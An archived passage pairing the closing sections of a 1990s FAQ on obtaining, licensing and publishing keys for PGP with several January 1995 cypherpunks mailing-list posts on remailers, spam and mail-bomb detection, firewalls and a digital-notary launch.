    Use ANSI terminal emulation, or if you can't, try VT-100.
    Free access to PGP.  If busy or no answer, try again later.
    For free access: log in with your own name, answer the questions, then
    select [Q]uestionaire 3 from the [M]ain menu.
    (303) 772-1062  Longmont, Colorado number - 2 lines.
    (303) 938-9654  Boulder, Colorado number forwarded to Longmont number
                    intended for use by people in the Denver, Colorado area.

The Freedom Files BBS, DeLand Florida, USA  904-738-2691

Exec-Net, New York, NY, USA  (Host BBS for the ILink net)  914-667-4567

The Ferret BBS (North Little Rock, Arkansas)
    (501) 791-0124   also   (501) 791-0125
    Special PGP users account:
    login name: PGP USER
    password:   PGP

CVRC BBS  317-791-9617

CyberGold BBS 601-582-5748

Self-Governor Information Resource, 915-587-7888, El Paso, Texas, USA

In the UK, try 01273-688888

MAUS BBS (+49 781 38807) Offenburg, Germany - angeschlossen an das MausNet


OTHER FTP SITES

    ftp.informatik.uni-hamburg.de
      /pub/virus/crypt/pgp
      This site has most, if not all, of the current PGP files.

    ftp.leo.org
      /pub/com/os/os2/crypt

    ftp.ox.ac.uk  (163.1.2.4)
      /pub/crypto/pgp
      This is a well organized site with most of the current PGP files as
      well as shells and mailer scripts.

    ftp.netcom.com
      /pub/dc/dcosenza -- Some crypto stuff, sometimes includes PGP.

    unix.hensa.ac.uk
      /pub/uunet/pub/security/virus/crypt/pgp

    ftp.ee.und.ac.za
      /pub/crypto/pgp

    ftp.csua.berkeley.edu
      /pub/cypherpunks/pgp (DOS, MAC)

    ftp.demon.co.uk
      /pub/amiga/pgp
      /pub/archimedes
      /pub/pgp
      /pub/mac/MacPGP

    ftp.informatik.tu-muenchen.de

    ftp.funet.fi

    ftp.dsi.unimi.it
      /pub/security/crypt/PGP

    atari.archive.umich.edu
      /pub/atari/Utilities/pgp261st.zip (Atari)

    ftp.tu-clausthal.de (139.174.2.10) (Atari ST/E,TT,Falcon)
      /pub/atari/misc/pgp/pgp261b.lzh

    wuarchive.wustl.edu
      /pub/aminet/util/crypt

    src.doc.ic.ac.uk (Amiga)
      /aminet
      /amiga-boing

    ftp.informatik.tu-muenchen.de
      /pub/comp/os/os2/crypt/pgp23os2A.zip (OS/2)

    iswuarchive.wustl.edu
      pub/aminet/util/crypt (Amiga)

    nic.funet.fi  (128.214.6.100)
      /pub/crypt

    ftp.uni-kl.de (131.246.9.95)
      /pub/aminet/util/crypt

    qiclab.scn.rain.com (147.28.0.97)

    pc.usl.edu (130.70.40.3)

    leif.thep.lu.se (130.235.92.55)

    goya.dit.upm.es (138.4.2.2)

    tupac-amaru.informatik.rwth-aachen.de (137.226.112.31)

    ftp.etsu.edu (192.43.199.20)

    pencil.cs.missouri.edu (128.206.100.207)

    ftp.csua.berkeley.edu

    kauri.vuw.ac.nz

    nctuccca.edu.tw
      /PC/wuarchive/pgp/

    ftp.fu-berlin.de:/mac/sys/init/MacPGP2.6uiV1.2en.cpt.hqx.gz

Also, try an archie search for PGP.


FTPMAIL

For those individuals who do not have access to FTP, but do have access
to e-mail, you can get FTP files mailed to you.  For information on
this service, send a message saying "help" to ftpmail@decwrl.dec.com.

Another e-mail service is from nic.funet.fi. Send mail to mailserv@nic.funet.fi
with the word HELP.

For the ftp sites on netcom, send mail to ftp-request@netcom.com containing
the word HELP in the body of the message.

To get pgp 2.6.i by email:
  Send a message to hypnotech-request@ifi.uio.no with your request in the
  Subject: field.

  Subject             What you will get

  GET pgp26i.zip      MS-DOS executable (uuencoded)
  GET pgp26is.zip     MS-DOS source code (uuencoded)
  GET pgp26is.tar.gz  UNIX source code (uuencoded)

For FAQ information, send e-mail to mail-server@rtfm.mit.edu with
      send usenet/news.answers/ftp-list/faq
in the body of the message.


MACPGP OPTIONS

There are multiple parallel efforts to write an up-to-date MacPGP.  See the
following for the latest MacPGP beta stuff. Zbigniew Fiedorowicz
<fiedorow@math.ohio-state.edu> has updated his MacPGP to support Apple
events, and his distribution comes with complete source code. Grady's netcom
directory contains a different version, about which he says "This latest bug
release beta 1.23 fixes several relatively minor bugs.  Source to this
version is NOT available, so its use should be restricted to experimentation
only."

ftp://ftp.csn.net/mpj/README.MPJ
ftp://ataxia.res.wpi.edu/pub/mac-pgp/README
ftp://highway.alinc.com/users/jordyn/mac-pgp/README
ftp://ftp.netcom.com/pub/gr/grady/PGP/MacPGP262b1.23.seq.hqx.asc


PGP FOR WINDOWS, WINDOWS NT, AND WINDOWS 95

There isn't one, yet, that I know of (at least not a true native Windows
application).  There are several good shells that call the DOS PGP for the
actual work, though.  I use Viacrypt's, but there are others available as
shareware or freeware at most of the sites listed above for PGP itself.


IS MY COPY OF PGP GOOD?

If you find a version of the PGP package that does not include the PGP User's
Guide, something is wrong.  The manual should always be included in the
package.  PGP should be signed by one of the developers (Philip Zimmermann,
Jeff Schiller, Viacrypt, Stale Schumacher, etc.).


OTHER PGP DOCUMENTATION

   For more information on the "time bomb" in PGP, see
   ftp://ftp.csn.net/mpj/pgpbomb.asc

   More PGP details are at
   http://www.pegasus.esprit.ec.org/people/arne/pgp.html

   Windows shells documentation
   http://www.LCS.com/winpgp.html

   Watch for the full PGP FAQ on alt.security.pgp.

LANGUAGE MODULES

   These are suitable for most PGP versions.  I am not aware of any
   export/import restrictions on these files.

    German
     * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_german.txt
     * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp_german.txt
     * _US:_ ftp://ftp.csn.net/mpj/public/pgp/PGP_german_docs.lha

    Italian
     * _IT:_
     ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.italian.tar.gz
     * _FI:_
     ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/PGP/pgp-lang.italian.tar.gz
     * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.italian.tar.gz

    Japanese
     * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_japanese.tar.gz
     * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-msgs-japanese.tar.gz

    Lithuanian
     * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_lithuanian.zip
     * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp23ltk.zip

    Russian
     * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp26_russian.zip
     * _RU:_ ftp://ftp.kiae.su/unix/crypto/pgp/pgp26ru.zip
     * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp26ru.zip

    Spanish
     * _IT:_
     ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.spanish.tar.gz
     * _FI:_
       ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/pgp-lang.spanish.tar.gz
     * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.spanish.tar.gz

    Swedish
     * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_swedish.txt
     * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp_swedish.txt


MAILINGLISTE FUER PGP UND VERWANDTES  (PGP MAILING LIST IN GERMAN)

Die Listenadresse:

        pgp-friends@fiction.pb.owl.de

Die *Request*adresse (fuer subscribe/unsubscribe und andere Administra-
tiva):

        pgp-friends-request@fiction.pb.owl.de


WHAT IS ALL THIS NONSENSE ABOUT EXPORT CONTROLS?

For a detailed rant, get ftp://ftp.csn.net/mpj/cryptusa.zip


WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST IN THE USA?

MIT PGP is only for personal, noncommercial use because of restrictions on
the licensing of both the RSA algorithm (attached to RSAREF) and the IDEA
algorithm.  PKP/RSADSI insist that we use RSAREF instead of the mpi library
for reasons that make sense to them.

For commercial use, use Viacrypt PGP, which is fully licensed to use both the
RSA and IDEA algorithms in commercial and corporate environments (as well as
personal use, of course).

Another restriction is due to an exclusive marketing agreement between Philip
Zimmermann and Viacrypt that applies to the USA and Canada only.  Viacrypt
has exclusive rights to market PGP commercialy in this area of the world.
This means that if you want to market PGP commercially in competition with
Viacrypt in the USA or Canada, you would have to create a new implementation
of the functions of PGP containing none of Philip Zimmermann's copyrighted
code.  You are free to modify existing PGP code for your own use, as long as
you don't sell it.  Phil would also appreciate your checking with him before
you distribute any modified versions of PGP as freeware.

"PGP", "Pretty Good Privacy" and "Phil's Pretty Good Software" are trademarks
owned by Philip Zimmermann.  This means that if you modify an older version of
PGP that was issued under the copyleft license and distribute it without
Phil's permission, you have to call it something else.  This avoids confusing
all of us and protects Phil's good name.


WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST IN CANADA?

MIT PGP is only for noncommercial use because of restrictions on the
licensing of the IDEA algorithm.  Because the RSA algorithm isn't patented in
Canada, you are free to use the mpi library instead of RSAREF, if you want
to, thus freeing yourself of the RSAREF license associated with the RSAREF
copyright, which is valid in Canada.

For commercial use, use Viacrypt PGP, which is fully licensed to use the IDEA
algorithm in commercial and corporate environments.

The exclusive marketing agreement with Viacrypt also applies in Canada.  See
the section on USA intellectual property restrictions for more details.


WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST OUTSIDE NORTH AMERICA?

MIT PGP is only for noncommercial in areas where there is a patent on
software implementations of the IDEA algorithm.  Because the RSA algorithm
isn't patented outside of the USA, you are free to use the mpi library
instead of RSAREF, if you want to, thus freeing yourself of the RSAREF
license restrictions.  The RSAREF copyright holds outside of the USA, even
though the RSA patent does not.

The IDEA conventional block cipher is covered by US Patent 5,214,703 and
European patent EP 0 482 154 B1.  IDEA is a trademark of Ascom-Tech AG.
Commercial users of IDEA (including commercial use of PGP) may obtain
licensing details from

Ph. Baumann, IDEA Lizenz
Ascom Tech AG
Postfach 151
CH-4502 Solothurn
Switzerland

Tel ++41 65 242828, Fax ++41 65 242847.


WHAT IS COMMERCIAL USE?

Use some common sense.  If you are running a business and using PGP to
protect credit card numbers sent to you electronically, then you are using
PGP commercially.  Your customers, however, need not buy the commercial
version of PGP just to buy something from you, if that is the only commercial
use they make of PGP (since they are spending, not making, money with PGP).

If you are just encrypting love letters or other personal mail (for which you
don't get paid) on your own personal computer, that is not commercial.  If
you are encrypting official business mail on your for-profit corporation's
computer with PGP, that is commercial use.

Note that there are some gray areas not covered above, and the patent owners
of RSA and IDEA may differ from my interpretation in the areas not covered
above, so if you are in doubt, you should consider the licensing of Viacrypt
PGP (or outside of North America, direct licensing of IDEA) to be cheap legal
insurance.  Indeed, the license fee is probably a lot cheaper than a legal
opinion from a lawyer qualified to make such a judgement.  Note that I am not
a lawyer and the above is not legal advise.  Use it at your own risk.


ARE MY KEYS COMPATIBLE WITH THE OTHER PGP VERSIONS?

If your RSA key modulus length is less than or equal to 1024 bits (I don't
recommend less, unless you have a really slow computer and little patience),
and if your key was generated in the PKCS format, then it will work with any
of the current PGP versions (MIT PGP 2.6, PGP 2.6ui, or Viacrypt PGP 2.7). If
this is not the case, you really should generate a new key that qualifies.

MIT PGP 2.6.2 should be able to use 2048 bit keys.  Generation of 2048 bit
keys was supposed to automatically be enabled in PGP 2.6.2 in December, 1994,
but a bug caused the actual key limit to be 2047 bits.


MORE WORLD WIDE WEB URLs

  http://draco.centerline.com:8080/~franl/pgp/pgp-mac-faq-hinely.html
  http://draco.centerline.com:8080/~franl/pgp/pgp.html
  http://draco.centerline.com:8080/~franl/crypto/cryptography.html
  http://www.pegasus.esprit.ec.org/people/arne/pgp.html
  http://rschp2.anu.edu.au:8080/crypt.html
  http://ibd.ar.com/PublicKeys.html
  http://www.ifi.uio.no/~staalesc/PGPversions.html

WINDOWS SHELLS

Several shells for running PGP with Microsoft Windows are available at the
same places PGP can be found.


MACPGP KIT

ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGP_icons.sit.hqx
ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkit.hqx
ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkitSources.sit.hqx


BUGS

See the documentation that comes with PGP in the latest versions for bugs in
the older versions.

The latest versions of PGP may not fully wipe all traces of plain text from a
file when given the -w option.

For more information, see http://www.mit.edu:8001/people/warlord/pgp-faq.html


BETSI - BELLCORE'S TRUSTED SOFTWARE INTEGRITY SYSTEM

For information on this service, send mail to certify@bellcore.com with the
subject help, or check http://info.bellcore.com/BETSI/betsi.html


INTEGRATING PGP AND PINE

Send blank e-mail to slutsky@lipschitz.sfasu.edu with Subject: mkpgp to get a
c-shell script to interface PGP and Pine.  Send a second message with
Subject: addtomkpgplist
if you want updates sent you automatically.


HOW DO I PUBLISH MY PGP PUBLIC KEY?

There are lots of ways.  One way is to use a key server.  Send mail to one of
these addresses with the single word "help" in the subject line to find out
how to use a key server.

        pgp-public-keys@pgp.iastate.edu
        pgp-public-keys@pgp.mit.edu
        pgp-public-keys@pgp.ai.mit.edu
        public-key-server@pgp.ai.mit.edu
        pgp-public-keys@cs.tamu.edu
        pgp-public-keys@chao.sw.oz.au
        pgp-public-keys@jpunix.com
        pgp-public-keys@dsi.unimi.it
        pgp-public-keys@kiae.su
        pgp-public-keys@fbihh.informatik.uni-hamburg.de

        There is also an experimental public key server at
        http://ibd.ar.com/PublicKeys.html

There is an excellent commercial key certification and publication service,
too.  For $20/year or so, you can have your key officially certified and
published in a "clean" key database that is much less susceptible to
denial-of-service attacks than the other key servers.  People need not pay
any fees to retrieve keys so published.  Send mail to info-pgp@Four11.com for
information, or look at http://www.Four11.com/

You can also mail your key to pgp-public-keys@c2.org, and it will be posted
to the subscribers of that mailing list, sent to the keyservers, and posted
to alt.security.keydist.  To subscribe to the mailing list, send a message to
majordomo@c2.org with "subscribe pgp-public-keys" in the body of the message.

Another way is to upload it to the PGP public keys area of the Colorado
Catacombs BBS (303-772-1062).  Another way is to just send it to your
correspondents.  You could add it to your .plan file so that finger returns
your key.  You could add it to some of your postings.  No matter which way you
do it, you should have your key signed by someone who verifies that your key
belongs to you, so that you don't have someone else generating a key that has
your name on it, but that isn't yours.

Here is my public key:

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.7

mQCNAi4PT2QAAAEEAPPCZnrshEJ9PSnV+mXEwjM4kzJF0kyg2MnLMzo83vWI40ei
jogncqdkXT0c2TQWg+Bsu9ckFoXdId0utumYv0aqd8yI/oU/DwJ1zJrqRL2PFbxe
ZLofHoKFjvq1TiNiJq9ps3jW6iYS4IU1SzyKhjmyE+K0+WyrPPX0zg8FAL9FAAUR
tCdNaWNoYWVsIFBhdWwgSm9obnNvbiA8bXBqQGNzbi5vcmc+IG1wajiJAJUDBRAv
Cw5o1TIhz19jpbkBARptA/9RHd27Io/48e3KRj/i/rptFTxdUR2DZTn+OrW23aNC
1fjH3YJl1C43lzipUL2Si6Paj1LKKBSVMVYAly8XMP5S+wEokzYffqsZfv6VrC7f
YozSNLsHbjDdY6JjRY6LHTU0hAe3grzWpBJPwc9oXsUJynrGk7jTCs+6nkrHddTa
zokAlQIFEC4bdyFleYS4x6lm3QEBm0AD/RHDmaKe2VQOAfJw1t6jIiIwegu7yNZo
JJqIZK350NTUD9tQKj6Ciu/lNjE4KVF/dceMPrNKihbJTPd6Gi2vM9gu6eFU4TZg
HE9T468oU5zfuZxmudcYGUXk1uWdJjGnTXzq0ZpObtYxbHs0OUdPga+HMclBI6ij
jzKQOQqb+aQsiQCVAgUQLg9Zuz9nBjyFM+vFAQErIwP8DuS/3ULVlkhG2RsL2T2W
xY6A6c7zAbxsYxqNpyjjrlnmWVYP5jxAIx1JZyjC04EZ9bRa/VtnW55t4KmDUvrq
knsL4E4TGuSA+pFUKy0suJV6soZ5I5mjfJe3FgphfuYdA+sen3x5/t9QbgiIpL5L
7OeYbGknCtWwdlGWEneFdSyJAJUCBRAuD1l59fTODwUAv0UBAUFMBACHi7hW6fta
E+4vp+xeJealpoZ94u13duJGP9o4wAbV4e6FV1Z6PHvWiubIpN00HZhXnpumwTcl
D8qEG5gOjQ1KRGep4zZL4R/tpkSDpDji5cbnamoJlSV20J5h86zdosJH1IyVzpjf
OalLAHXAo/Tn6033Ou41hUooEtYQgUBjtbQrTWljaGFlbCBQYXVsIEpvaG5zb24g
PG0ucC5qb2huc29uQGllZWUub3JnPokAlQMFEC8LDn/VMiHPX2OluQEBiGkD/0Qu
BxvMErp6BCaQVmh1Zxp0dghYZmAPK/15xDGLoTLcv7+hltDqntlZcH3Pb8UGTYmW
/v/+e0wPErTl3Fp+KV/tzcGqo/n2GwKAcrk6cYpMVysLr6c47Sf1c0/EE4Xhczx3
sfPxLBoJ6z8n/sq5WNfjgfOM9ol/hXUZpaJ+Ykf9tCBNaWNoYWVsIEpvaG5zb24g
PG1wakBuZXRjb20uY29tPokAlQMFEC8LDpTVMiHPX2OluQEBNWYD/iwuOas0LcM/
7UFhWc6qZBTaQ2i0/fLdSq1NbnqZ/qAga4Gp+wNmBI3xvNBnF1Vm76Ss9G2PWgIE
qzcJWLYULGVoT/rFwOLST4TXYK8m/juVKfinmntkwWeDRkXqlGWnvbndjNTYGwEn
D+gTouzLAeYrd955OqxaIaVaNRWGlZBbtChNaWtlIEpvaG5zb24gPDcxMzMxLjIz
MzJAY29tcHVzZXJ2ZS5jb20+iQCVAwUQLwsOqdUyIc9fY6W5AQGWsgP/dq1QNJ/1
ZsD3CJlcIGF/bbQwd6tozd2eXS4GQMwvuanHIuraGRVvAd1QodmWMQnVVOPOat5r
Wq9vOBGan2GFp/OTNCBJTS664Ezdi8cpIdcLYasHJEBZ1mWCrTXLdvRlvNtL80x3
SmZH28m9Z3QMghzUg3q6KuZUy58UCgnMAx20K01pY2hhZWwgUC4gSm9obnNvbiA8
bXBqb2huc29Abnl4LmNzLmR1LmVkdT6JAJUDBRAvCw6+1TIhz19jpbkBAa77A/4q
SsVT/+VsAHwmAn/JuXnNDOIqkqRlMMFWoB1QySEI8QHljrFJU5UphqWbVGhVNazv
FSMAtTkgbM6R6n1BTx9EObR4y3ZmfRHTZbSsDOYmtF2pWxCG/qfg9cOKJBD4oxB2
ORo74hXecb0dGrDwBgl0OEJ7BF4FMr1wzWhgodsP97QtRG8gbm90IHVzZSBmb3Ig
ZW5jcnlwdGlvbiBhZnRlciAyNyBKdW5lIDE5OTYuiQCVAwUQLwsO09UyIc9fY6W5
AQFyvgQAhPbYYVsYiyv67rKOEhROw/QKluloHZIvx53eWxVQ7KNpp/jg+KBVjL7N
yoteDcofbVseBugAiAFPJgNQVCGfG5w6rtvMm4tN8oTz/4Q+vf6DyCkQnj+Qu6KO
Fo80TgazVGeteODtCDiZg4wMUv0TNTd80NV6hm0Ygd/pmw+7A7w=
=htAN
- -----END PGP PUBLIC KEY BLOCK-----


TIME STAMP SERVICES

Mail sent to Time S. Tamp <timestamp@lorax.mv.com> will be returned, signed
with its own private key.


REPRODUCING THIS FAQ

Permission is granted to distribute unmodified copies of this FAQ.

To get the latest version of this FAQ, get
ftp://ftp.netcom.com/pub/mp/mpj/getpgp.asc or send mail to
ftp-request@netcom.com with the line
SEND mp/mpj/getpgp.asc
in the body of the message, or send blank mail to mpjohnso@nyx.cs.du.edu.
This FAQ is also archived at rtfm.mit.edu with a very long file name.

There are many other frequently asked questions.  Most of them are covered in
the documentation that comes with PGP or in one of the books about PGP.

Send corrections to mpj@netcom.com.  I regret that I lost some of the
corrections people sent me on the last round of this FAQ, so if I missed
yours, please send it again.  Thanks.

                  ___________________________________________________________
 |\  /| |        |                                                           |
 | \/ |o|        | Michael Paul Johnson  Colorado Catacombs BBS 303-772-1062 |
 |    | | /  _   | mpj@csn.org aka mpj@netcom.com m.p.johnson@ieee.org       |
 |    |||/  /_\  | ftp://ftp.csn.net/mpj/README.MPJ          CIS: 71331,2332 |
 |    |||\  (    | ftp://ftp.netcom.com/pub/mp/mpj/README  -. --- ----- .... |
 |    ||| \ \_/  |___________________________________________________________|


-----BEGIN PGP SIGNATURE-----
Version: 2.7

iQCVAgUBLxvrHPX0zg8FAL9FAQHz9AQAjdyLzJ2L+PSkqL0nZ4ULiq4ReHdYfLrX
DlBvkM9JG0jCgpDmcWkWg4IEUwJ8VoKnjFYaUgbw3CkCoIZYRekXrUkRgoZSq5TV
BdADxEXJabF7It3e6jH2ICVNSYdsfe/4xh+8F7v7CKzSZubtwaLOIbZ+CSBVi3D0
3iyn6+zrZVo=
=5zak
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 19 Jan 95 08:20:17 PST
To: cypherpunks@toad.com
Subject: internet mag
Message-ID: <199501191620.IAA22714@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


This month's issue of Internet World Magazine deals primarily with internet security. I'm am not going to review everything in the mag but I'll list the table of content:

Better Safe:
Danger lurks on the Info Highway. You must take precaution to reduce your riks.
By Dave Taylor and Rosalind Resnick

Getting Cryptic:
Phil Zimmermann's PGP gives you powerful encryption to keep your messages safe from prying eyes. Read all about it.
By William Stalling.
(Introductory article about PGP. Nothing we, here, don't already know)

Securing the Enterprise:
Connectiong your corporation to the Internet can be a security nightmare.
Firewalls are the main line of defense.
By Alton Hoover
(An overview of Firewalls, application-layer gateways and token-based authentication schemes)

Beyond the Firewall:
The latest  firewall technology not only detects intruders, but strikes back.
By Winn Schwartau
(Very interesting article. Here are some quotes to wet your appetite:
Wouldn't it be nice if a computer system attacked from the Internet responded to the attack by striking back at the intruder? This is exactly what Sidewinder's implementation of type enforcement does.....It will detect the intrusion immediately....As soon as a violation occurs, a silent alarm is activated....sidewinder can be configured to react in any number of ways, once an attack has been detected...it can shut the intruder cold...(or)...it can invoke a mechanism that would record all the information from whence came the attack....By luring the attacker into a false sense of security, the hacker would continue trying to break in, unaware that every step was being recorded...

Cashing In:
As Internet commerce expands, a host of companies are vying to establish their system as the basis for cyberbanking and credit-card transactions.
By Lisa Morgan

Business Browser:
New versions of Mosaic with built-in encryption promise to keep your transactions safe.
By Richard W. Wiggins

Unlawful Entry
Crackers can feasts on your data if you fail to plug your leaky Unix system
By Aaron Weiss
(Five Ways to crack a Unix System)

It's Alive:
Although the furor has subsided, reports of Clipper's death are greatly exaggerated. The government's controversial eavesdropping effort lives on.
By Steven Vaughan-Nichols

Building Trust
The chief executives of Trusted Information Systems -Steve Crocker and Steve Walker- talk about encryption, CyberCash, Clipper, and more.
By Jeff Ubois.

All in all a rather interesting mag. Check it out.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
wizard@alpha.c2.org
Give me the liberty to know, to utter, and to argue freely
according to conscience, above all liberties.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: habs@cmyk.warwick.com (Harry S. Hawk)
Date: Thu, 19 Jan 95 06:38:47 PST
To: cypherpunks@toad.com (Good Guys)
Subject: Re: Lance Rose writes anti-cryptoanarchy in WIRED
In-Reply-To: <199501190459.UAA26969@netcom12.netcom.com>
Message-ID: <9501191738.AA23269@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


Lance Rose is a good guy... IMHO..

1) I use his legal services

2) I haven't read the article but it seems reasonable esp. if 
   we don't have NON-Escrowed encyptions...

   e.g., if clipper wins I think Lance is probally correct...

3) he can be reached at 72230.2044@compuserve.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 19 Jan 95 06:41:35 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Lance Rose writes anti-cryptoanarchy in WIRED
In-Reply-To: <199501190404.UAA24779@netcom6.netcom.com>
Message-ID: <9501191441.AA03662@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May says:
> Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer"
> (?). When I met him a couple of years ago, he'd just gotten out of
> jail and was working for the satellite Usenet distribution company
> (whose name I don't recall, and who I've heard less of than I might've
> expected to, subjunctively speaking).

Don't confuse Len Rose and Lance Rose.

One is indeed a lawyer -- in fact, he's my lawyer.

Perry

Who notes that he's not the only person shooting from the hip these
days.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stuart@surety.com (Stuart Haber)
Date: Thu, 19 Jan 95 07:10:45 PST
To: cypherpunks@toad.com
Subject: Surety Technologies announces: Digital Notary System is on-line
Message-ID: <9501191509.AA00167@surety.com>
MIME-Version: 1.0
Content-Type: text/plain


Many readers of this list have heard about the work that Scott
Stornetta and I have done, beginning as Bellcore researchers a few
years ago, on the problem of cryptographically secure digital
time-stamping.  In 1993 Bellcore spun off a company in order to
commercialize this work.  The company is called Surety Technologies,
and we call our product and service the Digital Notary(tm) System.

I am happy to report that we have just launched the product.  To
read about it, as well as to get the software, please visit our
World-Wide Web home page:

	http://www.surety.com

You can get the software and installation instructions directly by
anonymous ftp to ftp.surety.com in the directory /dns/windows.

Scott and I would both like to thank those readers of the list
who have offered us their support, encouragement, and advice over
the years.

Stuart Haber              | Surety Technologies provides
Chief Scientist           | the Digital Notary(tm) System.
Surety Technologies, Inc. | General info: info@surety.com
stuart@surety.com         | (201) 701-0600, fax -0601




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rparratt@london.micrognosis.com (Richard Parratt)
Date: Thu, 19 Jan 95 02:12:54 PST
To: eric@remailer.net
Subject: Internet, spamming, etc.
Message-ID: <9501191012.AA04837@pero>
MIME-Version: 1.0
Content-Type: text/plain


> From owner-cypherpunks@toad.com Wed Jan 18 17:00:14 1995
> Date: Wed, 18 Jan 1995 07:54:00 -0800
> I also think this is the one great flaw in the design of the Internet;
> namely, that the sender has all the control over what packets flow
> over the net.  A receiver can ask for a slowdown or cessation, but
> there's no obligation to do so.  This will be, if anything, the
> limiting factor in scalability of the internet.

In theory, yes. 

However, almost all Internet protocols are TCP/IP based.
The receiver of a TCP connection can choose not to accept
the connection, or to drop it at any time. The window protocol
keeps the sender from transmitting faster than any part of
the connection can manage. (How do you think ftp transfers
between sites with disparate connection speeds would 
work otherwise?)

One could theoretically have a package that sprayed UDP packets
at a particular IP address, or even have a modified TCP
that ignored disconnects. I think most service providers
would regard using such code as being on a par with running
a program that tried to telnet sequentially to all known IP
addresses, trying common passwords on each.

--
Richard Parratt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalicqui@prairienet.org (Jeff Licquia)
Date: Thu, 19 Jan 95 08:45:58 PST
To: cypherpunks@toad.com
Subject: Re: JP vs Homer
Message-ID: <9501191645.AA26767@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


>     We are capable of controlling mail bombs, for instance, in the
>following way:
> 
>     Take an incoming message, capture From: line.  Strip header.  MD5 body.
>Add to sorted table [From: MD5(message) date].  Check for repetition of
>first two fields.  If reps = 1, forward message.  If reps = 2, send message
>to From:  "Possible error.  Two copies of message <message> received."  If
>reps = 0 mod 5, send letter to postmaster@From:.  "Possible mailbomb or
>spam.  <reps> copies of <message> received from <From:> at your site in the
>past week." Clear table of entries more than a week old every midnight.
> 
> 
>     If all remailers did this, then no matter where the net was entered,
>the messages would be rejected.  And spammers/bombers would be spamming/
>bombing their own postmaster.  Probably a bad idea.  If not all did it,
>then add special handling to hit remailer-operator@.  This would encourage
>the operator to auto-magically handle the spam-bomb himself.

This works only if one assumes that the exact same message is posted using
the exact same path.  Granted, it would probably be effective for novice
spammers.

Consider a premail/chain type script and a cleartext spam message.  The
script is executed once every five minutes, say.  When it runs, it creates a
new random path through the remailers, adding encryption wrappers for each
hop.  Your spam detector would miss this one completely unless your remailer
was used as the terminal remailer for a significant number of spams.  More
significantly, the MD5 hashes of each message would be different even if the
same path were used more than once because the PGP session key would be
different (again, unless your remailer would be the terminal remailer in the
particular path that repeated).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Thu, 19 Jan 95 10:51:01 PST
To: jalicqui@prairienet.org (Jeff Licquia)
Subject: Re: The Remailer Crisis
In-Reply-To: <9501191716.AA08891@firefly.prairienet.org>
Message-ID: <199501191847.KAA28985@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff's response is exactly what I was hoping for! The "Cypherpunks
distribution" version of Linux would be a great way to spread cheap
remailer technology on cheap Linux boxes. Hell, I might even augment
my Macs with one of these things!

Jeff Licquia wrote:

> The "Linux mavens" followed by the "black box" stuff sparked an idea...
> 
> First, before delving into dreamland: I'm sure Linux could be hung off just
> about any store-and-forward (a la UUCP) or TCP/IP-based network there is
> with a minimum of trouble.

This is what I'd expect....I just don't know the details.

> Now how 'bout this: Consider a new distribution of Linux, the "Cypherpunk"
> distribution (if ya don't like the name, make up yer own!).  This would be a
> bare minimum of a distribution, with nothing fancy: bash, misc. utils like
> ls, etc.  This can fit (tightly) in 20 MB.  The supplied kernel would have
> every networking option under the sun turned on, but would be otherwise bare
> of frills as well.  Now let's add minimal network utils (telnet and telnetd
> for connecting and sendmail for obvious reasons), perl, PGP, and a remailer
> package.  To make it as easy as possible, I'd use the UMSDOS filesystem, so
> that Linux could be installed on a DOS machine without any reformatting,
> repartitioning, or similar headaches.

A great idea. This could be the "remailer in a box" we've been talking
about for a long time. Could also include a package of security and
crypto utilities, etc. Sort of what the "Gnu" folks might do if they
were involved in crypto. (By "involved in crypto" I mean of course
Cypherpunks sorts of concerns, which Stallman seems to have not much
interest in, at least publically.)

> We could make this available via FTP or press some CD-ROMs if we were
> ambitious. Better yet, the cool Linux thing to do now is to install via NFS;
> this makes installing Linux as easy as sticking in a boot disk and pointing
> the install program at the NFS server (well, not quite, but pretty close).
> After adding in the cute little install program (like the Slackware
> distribution already has) and some boot options, you'd have an "instant
> remailer" software package, able to transform any 386SX/4MB RAM DOS machine
